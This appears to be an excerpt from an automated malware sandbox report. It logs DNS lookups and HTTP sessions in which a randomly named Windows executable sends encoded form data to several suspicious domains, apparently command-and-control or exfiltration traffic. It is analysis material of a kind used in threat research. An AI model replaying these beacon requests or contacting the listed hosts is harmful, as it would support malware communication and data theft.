Oct 22, 2024 05:40:27.521295071 CEST	53	60482	1.1.1.1	192.168.2.6
Oct 22, 2024 05:40:41.820821047 CEST	50924	53	192.168.2.6	1.1.1.1
Oct 22, 2024 05:40:41.888761997 CEST	53	50924	1.1.1.1	192.168.2.6
Oct 22, 2024 05:40:55.243583918 CEST	64954	53	192.168.2.6	1.1.1.1
Oct 22, 2024 05:40:55.251979113 CEST	53	64954	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 22, 2024 05:38:34.187200069 CEST	192.168.2.6	1.1.1.1	0x74c5	Standard query (0)	www.crochetpets.online	A (IP address)	IN (0x0001)	false
Oct 22, 2024 05:38:51.540106058 CEST	192.168.2.6	1.1.1.1	0x33ea	Standard query (0)	www.n0pme6.top	A (IP address)	IN (0x0001)	false
Oct 22, 2024 05:39:13.273544073 CEST	192.168.2.6	1.1.1.1	0x576a	Standard query (0)	www.kovallo.cloud	A (IP address)	IN (0x0001)	false
Oct 22, 2024 05:39:26.993957996 CEST	192.168.2.6	1.1.1.1	0x2ef2	Standard query (0)	www.hentaistgma.net	A (IP address)	IN (0x0001)	false
Oct 22, 2024 05:39:40.712183952 CEST	192.168.2.6	1.1.1.1	0x775e	Standard query (0)	www.ngmr.xyz	A (IP address)	IN (0x0001)	false
Oct 22, 2024 05:39:59.461600065 CEST	192.168.2.6	1.1.1.1	0x78c8	Standard query (0)	www.polarmuseum.info	A (IP address)	IN (0x0001)	false
Oct 22, 2024 05:40:12.820202112 CEST	192.168.2.6	1.1.1.1	0x407a	Standard query (0)	www.tophcom.online	A (IP address)	IN (0x0001)	false
Oct 22, 2024 05:40:26.226530075 CEST	192.168.2.6	1.1.1.1	0x8be5	Standard query (0)	www.inf30027group23.xyz	A (IP address)	IN (0x0001)	false
Oct 22, 2024 05:40:27.224221945 CEST	192.168.2.6	1.1.1.1	0x8be5	Standard query (0)	www.inf30027group23.xyz	A (IP address)	IN (0x0001)	false
Oct 22, 2024 05:40:41.820821047 CEST	192.168.2.6	1.1.1.1	0xf1d0	Standard query (0)	www.donante-de-ovulos.biz	A (IP address)	IN (0x0001)	false
Oct 22, 2024 05:40:55.243583918 CEST	192.168.2.6	1.1.1.1	0xaa04	Standard query (0)	www.shopdj00.xyz	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 22, 2024 05:38:34.413352966 CEST	1.1.1.1	192.168.2.6	0x74c5	No error (0)	www.crochetpets.online		208.91.197.27	A (IP address)	IN (0x0001)	false
Oct 22, 2024 05:38:52.124327898 CEST	1.1.1.1	192.168.2.6	0x33ea	No error (0)	www.n0pme6.top		198.44.251.203	A (IP address)	IN (0x0001)	false
Oct 22, 2024 05:38:52.124327898 CEST	1.1.1.1	192.168.2.6	0x33ea	No error (0)	www.n0pme6.top		198.44.251.51	A (IP address)	IN (0x0001)	false
Oct 22, 2024 05:39:13.355920076 CEST	1.1.1.1	192.168.2.6	0x576a	No error (0)	www.kovallo.cloud	kovallo.cloud		CNAME (Canonical name)	IN (0x0001)	false
Oct 22, 2024 05:39:13.355920076 CEST	1.1.1.1	192.168.2.6	0x576a	No error (0)	kovallo.cloud		81.2.196.19	A (IP address)	IN (0x0001)	false
Oct 22, 2024 05:39:27.077936888 CEST	1.1.1.1	192.168.2.6	0x2ef2	No error (0)	www.hentaistgma.net	hentaistgma.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 22, 2024 05:39:27.077936888 CEST	1.1.1.1	192.168.2.6	0x2ef2	No error (0)	hentaistgma.net		195.110.124.133	A (IP address)	IN (0x0001)	false
Oct 22, 2024 05:39:41.063884974 CEST	1.1.1.1	192.168.2.6	0x775e	No error (0)	www.ngmr.xyz		54.67.87.110	A (IP address)	IN (0x0001)	false
Oct 22, 2024 05:39:59.528155088 CEST	1.1.1.1	192.168.2.6	0x78c8	No error (0)	www.polarmuseum.info		199.59.243.227	A (IP address)	IN (0x0001)	false
Oct 22, 2024 05:40:12.834736109 CEST	1.1.1.1	192.168.2.6	0x407a	No error (0)	www.tophcom.online		162.213.249.216	A (IP address)	IN (0x0001)	false
Oct 22, 2024 05:40:27.521277905 CEST	1.1.1.1	192.168.2.6	0x8be5	No error (0)	www.inf30027group23.xyz	inf30027group23.xyz		CNAME (Canonical name)	IN (0x0001)	false
Oct 22, 2024 05:40:27.521277905 CEST	1.1.1.1	192.168.2.6	0x8be5	No error (0)	inf30027group23.xyz		221.121.144.149	A (IP address)	IN (0x0001)	false
Oct 22, 2024 05:40:27.521295071 CEST	1.1.1.1	192.168.2.6	0x8be5	No error (0)	www.inf30027group23.xyz	inf30027group23.xyz		CNAME (Canonical name)	IN (0x0001)	false
Oct 22, 2024 05:40:27.521295071 CEST	1.1.1.1	192.168.2.6	0x8be5	No error (0)	inf30027group23.xyz		221.121.144.149	A (IP address)	IN (0x0001)	false
Oct 22, 2024 05:40:41.888761997 CEST	1.1.1.1	192.168.2.6	0xf1d0	No error (0)	www.donante-de-ovulos.biz		199.59.243.227	A (IP address)	IN (0x0001)	false
Oct 22, 2024 05:40:55.251979113 CEST	1.1.1.1	192.168.2.6	0xaa04	Server failure (2)	www.shopdj00.xyz	none	none	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.crochetpets.online

www.n0pme6.top

www.kovallo.cloud

www.hentaistgma.net

www.ngmr.xyz

www.polarmuseum.info

www.tophcom.online

www.inf30027group23.xyz

www.donante-de-ovulos.biz

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49868	208.91.197.27	80	5776	C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe

Timestamp	Bytes transferred	Direction	Data
Oct 22, 2024 05:38:34.431626081 CEST	412	OUT	GET /y9rm/?kT9p=HEdRnjuxtNGVPFRX3NZ2CbxO5KjoR5mZP9Y7+HX2gpvgKHiu4zeqhoni6TAVjjgJNor6P4ykumohRwGjoGuDnTy/l81TemUdGivRuw5GfSiykvy81pD0xLcKVnn388uSWX5E4Mc=&in1Hf=rx3dZnMxlRvDbR HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.9 Host: www.crochetpets.online Connection: close User-Agent: Opera/9.80 (Windows NT 5.1) Presto/2.12.388 Version/12.14
Oct 22, 2024 05:38:36.186935902 CEST	1236	IN	HTTP/1.1 200 OK Date: Tue, 22 Oct 2024 03:38:34 GMT Server: Apache Referrer-Policy: no-referrer-when-downgrade Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com") X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_Qtc2gea7bvuwoSl9gQZa+EBHn/6zJ8NP3eci0sVDl8/E32W9tmMmFZq54YSg0GQ/KFtWVsPvINJV6/8ddwXYdA== Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Connection: close Data Raw: 39 65 64 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 65 6c 69 76 65 72 79 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65 74 22 3e 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 63 6d 70 5f 73 74 61 79 69 6e 69 66 72 61 6d 65 20 3d 20 31 3b 20 77 69 6e 64 6f 77 2e 63 6d 70 5f 64 6f 6e 74 6c 6f 61 64 69 6e 69 66 72 61 6d 65 20 3d 20 74 72 75 65 3b 20 69 66 28 [TRUNCATED] Data Ascii: 9edc<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><link rel="preconnect" href="https://delivery.consentmanager.net"> <link rel="preconnect" href="https://cdn.consentmanager.net"> <script>window.cmp_stayiniframe = 1; window.cmp_dontloadiniframe = true; if(!"gdprAppliesGlobally" in window){window.gdprApp
Oct 22, 2024 05:38:36.186949015 CEST	110	IN	Data Raw: 6c 69 65 73 47 6c 6f 62 61 6c 6c 79 3d 74 72 75 65 7d 69 66 28 21 28 22 63 6d 70 5f 69 64 22 20 69 6e 20 77 69 6e 64 6f 77 29 7c 7c 77 69 6e 64 6f 77 2e 63 6d 70 5f 69 64 3c 31 29 7b 77 69 6e 64 6f 77 2e 63 6d 70 5f 69 64 3d 30 7d 69 66 28 21 28 Data Ascii: liesGlobally=true}if(!("cmp_id" in window)\|\|window.cmp_id<1){window.cmp_id=0}if(!("cmp_cdid" in window)){windo
Oct 22, 2024 05:38:36.186959982 CEST	1236	IN	Data Raw: 77 2e 63 6d 70 5f 63 64 69 64 3d 22 32 31 66 64 63 61 32 32 38 31 38 33 33 22 7d 69 66 28 21 28 22 63 6d 70 5f 70 61 72 61 6d 73 22 20 69 6e 20 77 69 6e 64 6f 77 29 29 7b 77 69 6e 64 6f 77 2e 63 6d 70 5f 70 61 72 61 6d 73 3d 22 22 7d 69 66 28 21 Data Ascii: w.cmp_cdid="21fdca2281833"}if(!("cmp_params" in window)){window.cmp_params=""}if(!("cmp_host" in window)){window.cmp_host="a.delivery.consentmanager.net"}if(!("cmp_cdn" in window)){window.cmp_cdn="cdn.consentmanager.net"}if(!("cmp_proto" in wi
Oct 22, 2024 05:38:36.186992884 CEST	146	IN	Data Raw: 3f 6e 61 76 69 67 61 74 6f 72 2e 6c 61 6e 67 75 61 67 65 73 3a 5b 5d 3b 69 66 28 66 2e 69 6e 64 65 78 4f 66 28 22 63 6d 70 6c 61 6e 67 3d 22 29 21 3d 2d 31 29 7b 63 2e 70 75 73 68 28 66 2e 73 75 62 73 74 72 28 66 2e 69 6e 64 65 78 4f 66 28 22 63 Data Ascii: ?navigator.languages:[];if(f.indexOf("cmplang=")!=-1){c.push(f.substr(f.indexOf("cmplang=")+8,2).toUpperCase())}else{if(e.indexOf("cmplang=")!=-1)
Oct 22, 2024 05:38:36.194205999 CEST	1236	IN	Data Raw: 7b 63 2e 70 75 73 68 28 65 2e 73 75 62 73 74 72 28 65 2e 69 6e 64 65 78 4f 66 28 22 63 6d 70 6c 61 6e 67 3d 22 29 2b 38 2c 32 29 2e 74 6f 55 70 70 65 72 43 61 73 65 28 29 29 7d 65 6c 73 65 7b 69 66 28 22 63 6d 70 5f 73 65 74 6c 61 6e 67 22 20 69 Data Ascii: {c.push(e.substr(e.indexOf("cmplang=")+8,2).toUpperCase())}else{if("cmp_setlang" in window&&window.cmp_setlang!=""){c.push(window.cmp_setlang.toUpperCase())}else{if(a.length>0){for(var d=0;d<a.length;d++){c.push(a[d])}}}}}if("language" in navi
Oct 22, 2024 05:38:36.194216013 CEST	146	IN	Data Raw: 30 2c 77 2e 69 6e 64 65 78 4f 66 28 22 26 22 29 29 7d 72 65 74 75 72 6e 20 77 7d 76 61 72 20 6b 3d 28 22 63 6d 70 5f 70 72 6f 74 6f 22 20 69 6e 20 68 29 3f 68 2e 63 6d 70 5f 70 72 6f 74 6f 3a 22 68 74 74 70 73 3a 22 3b 69 66 28 6b 21 3d 22 68 74 Data Ascii: 0,w.indexOf("&"))}return w}var k=("cmp_proto" in h)?h.cmp_proto:"https:";if(k!="http:"&&k!="https:"){k="https:"}var g=("cmp_ref" in h)?h.cmp_ref:l
Oct 22, 2024 05:38:36.194470882 CEST	1236	IN	Data Raw: 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3b 76 61 72 20 6a 3d 75 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 6a 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 63 6d 70 2d 61 62 22 2c 22 31 22 29 3b 76 61 72 Data Ascii: ocation.href;var j=u.createElement("script");j.setAttribute("data-cmp-ab","1");var c=x("cmpdesign","cmp_design" in h?h.cmp_design:"");var f=x("cmpregulationkey","cmp_regulationkey" in h?h.cmp_regulationkey:"");var r=x("cmpgppkey","cmp_gppkey"
Oct 22, 2024 05:38:36.194482088 CEST	1236	IN	Data Raw: 62 75 67 75 6e 6d 69 6e 69 6d 69 7a 65 64 3a 30 29 3e 30 3f 22 22 3a 22 2e 6d 69 6e 22 3b 76 61 72 20 61 3d 78 28 22 63 6d 70 64 65 62 75 67 63 6f 76 65 72 61 67 65 22 2c 22 63 6d 70 5f 64 65 62 75 67 63 6f 76 65 72 61 67 65 22 20 69 6e 20 68 3f Data Ascii: bugunminimized:0)>0?"":".min";var a=x("cmpdebugcoverage","cmp_debugcoverage" in h?h.cmp_debugcoverage:"");if(a=="1"){m="instrumented";p=""}var j=u.createElement("script");j.src=k+"//"+h.cmp_cdn+"/delivery/"+m+"/cmp"+b+p+".js";j.type="text/java
Oct 22, 2024 05:38:36.194490910 CEST	292	IN	Data Raw: 29 7b 62 3d 62 2e 73 75 62 73 74 72 28 31 2c 62 2e 6c 65 6e 67 74 68 29 7d 76 61 72 20 67 3d 62 2e 73 75 62 73 74 72 69 6e 67 28 30 2c 62 2e 69 6e 64 65 78 4f 66 28 22 3d 22 29 29 3b 69 66 28 62 2e 69 6e 64 65 78 4f 66 28 22 3b 22 29 21 3d 2d 31 Data Ascii: ){b=b.substr(1,b.length)}var g=b.substring(0,b.indexOf("="));if(b.indexOf(";")!=-1){var c=b.substring(b.indexOf("=")+1,b.indexOf(";"))}else{var c=b.substr(b.indexOf("=")+1,b.length)}if(h==g){f=c}var e=b.indexOf(";")+1;if(e==0){e=b.length}b=b.s
Oct 22, 2024 05:38:36.201793909 CEST	1236	IN	Data Raw: 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3d 61 72 67 75 6d 65 6e 74 73 3b 5f 5f 63 6d 70 2e 61 3d 5f 5f 63 6d 70 2e 61 7c 7c 5b 5d 3b 69 66 28 21 61 2e 6c 65 6e 67 74 68 29 7b 72 65 74 75 72 6e 20 5f 5f 63 6d 70 2e 61 7d 65 6c 73 65 7b 69 66 Data Ascii: unction(){var a=arguments;__cmp.a=__cmp.a\|\|[];if(!a.length){return __cmp.a}else{if(a[0]==="ping"){if(a[1]===2){a[2]({gdprApplies:gdprAppliesGlobally,cmpLoaded:false,cmpStatus:"stub",displayStatus:"hidden",apiVersion:"2.2",cmpId:31},true)}else{
Oct 22, 2024 05:38:36.201805115 CEST	146	IN	Data Raw: 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 22 29 7b 76 61 72 20 68 3d 66 61 6c 73 65 3b 5f 5f 67 70 70 2e 65 3d 5f 5f 67 70 70 2e 65 7c 7c 5b 5d 3b 66 6f 72 28 76 61 72 20 64 3d 30 3b 64 3c 5f 5f 67 70 70 2e 65 2e 6c 65 6e 67 74 68 Data Ascii: removeEventListener"){var h=false;__gpp.e=__gpp.e\|\|[];for(var d=0;d<__gpp.e.length;d++){if(__gpp.e[d].id==e){__gpp.e[d].splice(d,1);h=true;break}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49962	198.44.251.203	80	5776	C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe

Timestamp	Bytes transferred	Direction	Data
Oct 22, 2024 05:38:52.140813112 CEST	647	OUT	POST /81ii/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Host: www.n0pme6.top Origin: http://www.n0pme6.top Connection: close Cache-Control: no-cache Content-Length: 209 Content-Type: application/x-www-form-urlencoded Referer: http://www.n0pme6.top/81ii/ User-Agent: Opera/9.80 (Windows NT 5.1) Presto/2.12.388 Version/12.14 Data Raw: 6b 54 39 70 3d 76 47 77 4f 4a 33 78 42 46 48 33 4d 30 59 6e 2f 54 54 41 45 47 59 6d 54 42 56 53 4c 6e 6f 50 42 4a 62 65 4a 68 41 41 36 4f 6a 4d 48 5a 4f 30 5a 77 43 4b 64 42 49 39 7a 50 30 34 33 77 32 54 59 34 32 43 2b 2b 55 49 59 44 33 6a 5a 42 63 45 51 73 7a 4c 74 55 2f 43 68 38 59 66 2b 65 66 76 39 50 76 4a 46 71 2f 62 37 4a 32 45 48 2f 70 62 4c 61 42 54 41 54 66 33 6a 43 4d 64 2f 75 72 41 4b 63 49 64 6e 51 36 57 44 4e 67 75 54 6f 4c 37 2f 7a 6a 4b 74 79 38 4a 4f 36 51 4d 46 71 53 6e 47 52 6b 51 69 72 63 61 43 35 33 63 74 48 49 66 73 4c 43 4e 4f 53 61 33 63 53 6b 4a 74 50 67 46 39 75 4d 4d 4b 6e 77 4e 74 71 46 77 6c Data Ascii: kT9p=vGwOJ3xBFH3M0Yn/TTAEGYmTBVSLnoPBJbeJhAA6OjMHZO0ZwCKdBI9zP043w2TY42C++UIYD3jZBcEQszLtU/Ch8Yf+efv9PvJFq/b7J2EH/pbLaBTATf3jCMd/urAKcIdnQ6WDNguToL7/zjKty8JO6QMFqSnGRkQircaC53ctHIfsLCNOSa3cSkJtPgF9uMMKnwNtqFwl

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49973	198.44.251.203	80	5776	C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe

Timestamp	Bytes transferred	Direction	Data
Oct 22, 2024 05:38:54.683263063 CEST	671	OUT	POST /81ii/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Host: www.n0pme6.top Origin: http://www.n0pme6.top Connection: close Cache-Control: no-cache Content-Length: 233 Content-Type: application/x-www-form-urlencoded Referer: http://www.n0pme6.top/81ii/ User-Agent: Opera/9.80 (Windows NT 5.1) Presto/2.12.388 Version/12.14 Data Raw: 6b 54 39 70 3d 76 47 77 4f 4a 33 78 42 46 48 33 4d 32 34 33 2f 51 77 59 45 52 6f 6d 55 4d 46 53 4c 74 49 50 46 4a 62 53 4a 68 43 73 71 4e 52 59 48 58 50 45 5a 7a 42 53 64 43 49 39 7a 58 45 34 79 74 6d 54 54 34 32 65 4d 2b 51 4d 59 44 33 33 5a 42 64 30 51 73 41 54 79 4f 50 43 6a 30 34 66 38 51 2f 76 39 50 76 4a 46 71 2f 50 52 4a 32 4d 48 6a 49 72 4c 62 6b 6e 66 4e 76 33 67 53 63 64 2f 6c 4c 41 4f 63 49 64 5a 51 37 4c 73 4e 6d 71 54 6f 4b 6e 2f 7a 79 4b 69 34 38 4a 79 30 77 4e 48 70 53 47 52 63 46 39 41 6b 50 48 68 76 58 31 4e 47 2b 65 32 58 78 4e 74 41 4b 58 65 53 6d 52 66 50 41 46 58 73 4d 30 4b 31 6e 42 4b 6c 78 56 47 73 49 71 74 62 51 4c 71 2b 53 71 37 61 42 35 6c 52 35 6c 71 44 51 3d 3d Data Ascii: kT9p=vGwOJ3xBFH3M243/QwYERomUMFSLtIPFJbSJhCsqNRYHXPEZzBSdCI9zXE4ytmTT42eM+QMYD33ZBd0QsATyOPCj04f8Q/v9PvJFq/PRJ2MHjIrLbknfNv3gScd/lLAOcIdZQ7LsNmqToKn/zyKi48Jy0wNHpSGRcF9AkPHhvX1NG+e2XxNtAKXeSmRfPAFXsM0K1nBKlxVGsIqtbQLq+Sq7aB5lR5lqDQ==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	49974	198.44.251.203	80	5776	C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe

Timestamp	Bytes transferred	Direction	Data
Oct 22, 2024 05:38:57.229672909 CEST	1684	OUT	POST /81ii/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Host: www.n0pme6.top Origin: http://www.n0pme6.top Connection: close Cache-Control: no-cache Content-Length: 1245 Content-Type: application/x-www-form-urlencoded Referer: http://www.n0pme6.top/81ii/ User-Agent: Opera/9.80 (Windows NT 5.1) Presto/2.12.388 Version/12.14 Data Raw: 6b 54 39 70 3d 76 47 77 4f 4a 33 78 42 46 48 33 4d 32 34 33 2f 51 77 59 45 52 6f 6d 55 4d 46 53 4c 74 49 50 46 4a 62 53 4a 68 43 73 71 4e 52 41 48 58 39 4d 5a 78 67 53 64 44 49 39 7a 4a 30 34 7a 74 6d 54 4f 34 32 47 49 2b 51 41 75 44 31 50 5a 41 37 67 51 6b 52 54 79 62 66 43 6a 72 6f 66 2f 65 66 75 6e 50 76 35 42 71 2f 66 52 4a 32 4d 48 6a 4c 7a 4c 4c 42 54 66 50 76 33 6a 43 4d 64 34 75 72 41 32 63 49 45 69 51 34 6d 54 4e 56 69 54 70 71 33 2f 77 41 53 69 30 38 4a 4b 31 41 4e 6c 70 53 4c 57 63 46 68 6d 6b 4d 61 32 76 51 46 4e 4b 4a 79 67 4f 78 4e 4f 55 4c 50 76 45 58 5a 61 41 31 6c 48 30 73 51 49 38 6c 4d 2b 67 6c 6c 78 6c 34 65 73 59 68 32 30 7a 55 4f 72 43 52 51 4c 64 36 30 4e 41 52 61 5a 4b 37 4f 79 51 71 48 6e 4b 39 71 4c 6f 31 4f 53 43 62 4b 49 72 65 79 77 62 79 32 77 49 65 45 6d 4d 7a 50 37 6b 4d 52 55 57 44 53 71 4d 6a 54 37 5a 32 62 50 37 54 47 49 4e 38 62 49 4e 42 46 33 68 70 33 70 70 78 68 6e 37 52 58 47 49 4d 77 61 67 72 57 34 50 47 30 32 68 53 42 69 35 68 47 4e 44 6f 2b 66 34 48 44 48 66 [TRUNCATED] Data Ascii: kT9p=vGwOJ3xBFH3M243/QwYERomUMFSLtIPFJbSJhCsqNRAHX9MZxgSdDI9zJ04ztmTO42GI+QAuD1PZA7gQkRTybfCjrof/efunPv5Bq/fRJ2MHjLzLLBTfPv3jCMd4urA2cIEiQ4mTNViTpq3/wASi08JK1ANlpSLWcFhmkMa2vQFNKJygOxNOULPvEXZaA1lH0sQI8lM+gllxl4esYh20zUOrCRQLd60NARaZK7OyQqHnK9qLo1OSCbKIreywby2wIeEmMzP7kMRUWDSqMjT7Z2bP7TGIN8bINBF3hp3ppxhn7RXGIMwagrW4PG02hSBi5hGNDo+f4HDHfA7t4kzHVkWSe0c6bsptX56fdBCCQWUMPEEdKLAL+6MDEumpQ9mG04RfW5GlG9p20MmuX91Ulv9B2fn7+tIhaojM3tEdcFfYoQoAicnw4Chf4zijKXtWGeP7zAjAlQXER2e2LlDdsI9DfOJ6JJ+pQXXZO48I9oQ3s7ultrQMkBCQM8Jv8DC51sCCXCDG/WLW9PpG7X9I2sdiP++GwDoFxUiAGDgWAV6sfR5ta3XELAKEv2OK66WiVcoAu4Jp2Et9S4WpWs0eWKnCWs1rGy0Fz8SMjl5KZc8PdK/oLARmlXN0F6waxa7vu5+2Twfhc8T3KWflPATb22kyNTLQY0dxF3FOIm3KIEIM+o5cdB16gjrGfQHdHCCGFZWIrN6CAR7QCkPNInQqZsEBLSvT846pwdcK3gBdg2x6256qHyhArmr7dUlI6xW+17+W80IqZeciLIWL+yW/sKvL2QI0wy+LpfsVGRWw5R0pjB1y74VQYeX79s10oVg7x4moiu0lPUnMa9HwW9Ybzeh+to1LrTUyW7x4OwPG8lpLp4sGxzSXn3cP29fHoRTEi3bohz90CBZ49MmOnRjVllfKDJmKn2BBqYIfrJqUv1ZJbjSis2V1emrexFANEYnwX2MbKkEjSvBZ3069oz7ki2vDrEuLIplmFfRblorIj/5Xp5N [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	49975	198.44.251.203	80	5776	C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe

Timestamp	Bytes transferred	Direction	Data
Oct 22, 2024 05:38:59.776449919 CEST	404	OUT	GET /81ii/?kT9p=iEYuKHcgXzrj54zBLQ0hZtaSJWaO6arULYSJgyArOy1vcIlOyDidBtx/KVwStm3n+ESjpSctJ0ezJOALnhKyScKD8qKcTeL6NPgmk/TuCnkayb3nWF3ZDNroKudPs/s9dqx/VNU=&in1Hf=rx3dZnMxlRvDbR HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.9 Host: www.n0pme6.top Connection: close User-Agent: Opera/9.80 (Windows NT 5.1) Presto/2.12.388 Version/12.14

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	49976	81.2.196.19	80	5776	C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe

Timestamp	Bytes transferred	Direction	Data
Oct 22, 2024 05:39:13.372646093 CEST	656	OUT	POST /whrh/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Host: www.kovallo.cloud Origin: http://www.kovallo.cloud Connection: close Cache-Control: no-cache Content-Length: 209 Content-Type: application/x-www-form-urlencoded Referer: http://www.kovallo.cloud/whrh/ User-Agent: Opera/9.80 (Windows NT 5.1) Presto/2.12.388 Version/12.14 Data Raw: 6b 54 39 70 3d 74 6c 69 2f 69 65 44 54 42 37 74 78 4a 4e 4f 75 49 68 45 6b 4d 77 4d 51 66 6f 34 33 68 31 39 32 69 6f 34 47 6d 72 46 6c 34 50 74 67 32 51 46 37 67 49 2f 64 38 54 64 44 62 6b 65 4b 53 71 59 46 66 4d 51 62 52 76 4e 68 31 44 7a 41 6b 44 38 64 33 2f 55 64 61 2b 61 59 36 33 77 36 7a 43 6a 41 68 64 32 61 69 6e 48 47 78 4b 61 42 65 70 38 47 33 45 32 47 4f 46 6b 47 79 53 4a 52 76 47 58 55 76 35 32 6a 7a 46 44 50 76 36 45 59 79 51 63 7a 6c 47 76 56 4a 4e 46 71 35 78 4d 74 37 6d 62 57 6b 39 70 59 65 75 59 41 71 48 46 38 36 34 37 62 74 41 61 50 4e 7a 65 37 53 54 4a 50 72 70 48 74 57 64 36 72 6e 45 4d 38 6b 76 67 5a Data Ascii: kT9p=tli/ieDTB7txJNOuIhEkMwMQfo43h192io4GmrFl4Ptg2QF7gI/d8TdDbkeKSqYFfMQbRvNh1DzAkD8d3/Uda+aY63w6zCjAhd2ainHGxKaBep8G3E2GOFkGySJRvGXUv52jzFDPv6EYyQczlGvVJNFq5xMt7mbWk9pYeuYAqHF8647btAaPNze7STJPrpHtWd6rnEM8kvgZ
Oct 22, 2024 05:39:14.210371971 CEST	292	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 22 Oct 2024 03:39:14 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Content-Encoding: gzip Data Raw: 36 62 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6b(HML),I310Q/Qp/K&T$dCAfAyyyr0.a30

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	49978	81.2.196.19	80	5776	C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe

Timestamp	Bytes transferred	Direction	Data
